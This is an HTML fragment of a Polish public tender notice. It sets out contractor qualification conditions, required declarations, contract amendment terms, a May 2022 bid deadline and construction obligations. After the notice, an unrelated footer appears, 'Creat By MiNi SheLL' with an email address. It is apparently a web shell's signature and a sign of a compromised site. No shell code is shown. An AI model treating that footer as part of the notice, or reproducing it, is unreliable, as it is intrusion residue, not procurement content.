mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Informacja o warunkach udziału w postępowaniu o udzielenie zamówienia.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>rozdziale IV SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu określone poniżej.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Warunki dla przedmiotu zamówienia - wymagane jest spełnienie przez Wykonawcę: wykonawca spełni warunek, jeżeli<br/>wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy w tym okresie, wykonał należycie co najmniej jedną dostawę fabrycznie nowego urządzenia (urządzeń)/ sprzętu/<br/>maszyn o podobnym charakterze funkcjonalnym i parametrach technicznych odpowiadających zakresowi niniejszego<br/>postępowania o łącznej wartości dostawy nie mniejszej niż 250 000,00 zł brutto.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze<br/>wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>5. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie<br/>z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369 ze zm.), z innym wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału<br/>w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz<br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz<br/>dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz<br/>załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów- oświadczenie wykonawcy. Wymagane jest wykazanie co najmniej jednej dostawy fabrycznie nowego urządzenia (urządzeń)/ sprzętu/ maszyn o podobnym charakterze funkcjonalnym i parametrach technicznych odpowiadających<br/>zakresowi niniejszego postępowania o łącznej wartości dostawy nie mniejszej niż 250 000,00 zł brutto - Załącznik nr 7 do SWZ.<br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia –art. 58 - 60 ustawy Pzp.<br/>W takim przypadku:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika. Pełnomocnictwo powinno być do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>przedmiotowego zamówienia publicznego;<br/>2) wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie<br/>z pełnomocnikiem;<br/>3) jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Oprócz przypadków, o których mowa w art. 455 ust. 1 pkt 2- 4 i ust. 2 ustawy Pzp, Zamawiający na podstawie art. 455<br/>ust. 1 pkt 1 ustawy Pzp dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawierania<br/>umowy lub w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) w zakresie zmiany wysokości wynagrodzenia w przypadku:<br/>a) zmiany stawki podatku od towarów i usług oraz podatku akcyzowego, z tym zastrzeżeniem, że wartość netto<br/>wynagrodzenia wykonawcy nie zmieni się, a wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych<br/>przepisów;<br/>b) zmiany wysokości minimalnego wynagrodzenia za pracę, z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie<br/>zmianie o wartość wzrostu całkowitego kosztu wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio<br/>wykonujących niniejsze zamówienie do wysokości obowiązującego minimalnego wynagrodzenia,<br/>z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia;<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenie społeczne lub zdrowotne, z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie zmianie o wartość<br/>wzrostu całkowitego kosztu wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany,<br/>przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących niniejsze zamówienie;<br/>d) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych,<br/>o których mowa w ustawie z 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie zmianie o wartość wzrostu kosztu wykonawcy, jaką będzie on<br/>zobligowany ponieść w przypadku zmiany przepisów dotyczących zasad gromadzenia lub wpłat podstawowych<br/>finansowanych przez podmiot zatrudniający do pracowniczych planów kapitałowych w odniesieniu do osób bezpośrednio<br/>wykonujących niniejsze zamówienie;<br/>2) w zakresie zmiany terminu realizacji zamówienia, o którym mowa w § 2 niniejszej umowy, jego przedłużenie może<br/>nastąpić w przypadku:<br/>Pozostałe zapisy w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/przedecz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-26 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ) Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest również do wykonania wszelkich robót<br/>przygotowawczych, pomiarowych, porządkowych, utrzymania, zabezpieczenia i organizacji prac na danym terenie oraz<br/>innych czynności niezbędnych do wykonania przedmiotu zamówienia.<br/>2) Wykonawca w ramach przedmiotu zamówienia wykona:<br/>- dokumentację powykonawczą w 1 egzemplarzu do przedmiotu zamówienia zawierającą wszystkie atesty i certyfikaty<br/>wbudowanych urządzeń i materiałów, protokoły badań, pomiarów, sprawdzeń.<br/>W ramach realizacji przedmiotu zamówienia Zamawiający wymaga:<br/>- Zorganizowania zaplecza socjalno- technicznego budowy w rozmiarach koniecznych do realizacji przedmiotu zamówienia<br/>na terenie przekazanym Wykonawcy.<br/>- Zapewnienia bezpieczeństwa ppoż. oraz bezpiecznych warunków realizacji robót<br/>i przestrzegania przepisów BHP na terenie budowy.<br/>- Wykonywania robót zgodnie z wymogami Prawa budowlanego jak również<br/>z obowiązującymi przepisami prawa, Polskimi Normami i zasadami wiedzy technicznej oraz należytą starannością w ich<br/>wykonaniu, dobrą jakością i z zachowaniem obowiązujących wymagań i przepisów BHP i ppoż.<br/>- Wykonania prób, badań i pomiarów odbiorowych przewidzianych<br/>w specyfikacjach technicznych, warunkach technicznych wykonania i odbioru robót oraz Polskich Normach.<br/>- Zabezpieczenia terenu realizacji przedmiotu zamówienia w sposób pewny i trwały zgodnie<br/>z wymaganiami prawa i aktów wykonawczych.<br/>- Wyznaczenia przez Wykonawcę kierownika robót – spełniającego wymagania kwalifikacyjne dla osób zatrudnionych na<br/>tym stanowisku – do nadzorowania prac<br/>i współpracy z Zamawiającym.<br/>- Uczestniczenia w naradach dotyczących postępu robót, zwoływanych przez Zamawiającego.<br/>- Zaleca się, aby Wykonawca przed przygotowaniem oferty, zapoznał się<br/>z miejscem prowadzenia prac i dostaw tj.: poprzez dokonanie wizji lokalnej, zadanie wszelkich pytań związanych z realizacją<br/>zamówienia.<br/>3) Wykonawca będzie ponosił pełną odpowiedzialność za wypadki i szkody powstałe<br/>w związku z nieprawidłowym oznakowaniem terenu budowy oraz wykonywaniem robót będących przedmiotem zamówienia.<br/>4) Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną, obowiązującymi<br/>przepisami i normami oraz przy zachowaniu przepisów BHP. Wykonawca gwarantuje także wykonanie przedmiotu<br/>zamówienia pod kierownictwem osób posiadających wymagane przygotowanie zawodowe.

Creat By MiNi SheLL
Email: jattceo@gmail.com